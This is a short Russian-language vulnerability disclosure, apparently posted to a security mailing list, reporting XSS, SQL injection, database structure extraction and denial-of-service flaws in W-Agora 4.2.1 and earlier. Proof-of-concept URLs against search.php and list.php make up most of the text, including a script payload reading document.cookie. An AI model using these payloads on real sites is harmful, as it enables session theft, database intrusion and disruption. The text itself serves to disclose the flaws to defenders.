Многочисленные уязвимости в W-Agora

Здравствуйте 3APA3A!

Сообщаю вам о найденных мною многочисленных Cross-Site Scripting, SQL DB Structure Extraction, SQL Injection и Denial of Service
уязвимостях в W-Agora.

XSS (WASC-08):

http://site/current/search.php?bn=support_news&search_forum='%3Cscript%3Ealert(document.cookie)%3C/script%3E&site=support&gosearch=1

SQL DB Structure Extraction (WASC-13):

http://site/current/search.php?bn=support_news&search_forum='&site=support&gosearch=1

SQL Injection (WASC-19):

http://site/current/search.php?bn=support_news&search_forum='%20or%20version()%3E'5&site=support&gosearch=1

DoS (WASC-10):

http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=%25

http://site/current/search.php?bn=support_news&search_forum=support_news&site=support&gosearch=1&pattern=

http://site/current/list.php?site=support&bn=support_news

Уязвимы W-Agora 4.2.1 и предыдущие версии.

Дополнительная информация о данных уязвимостях у меня на сайте:
http://websecurity.com.ua/4650/

Best wishes & regards,
MustLive
Администратор сайта
http://websecurity.com.ua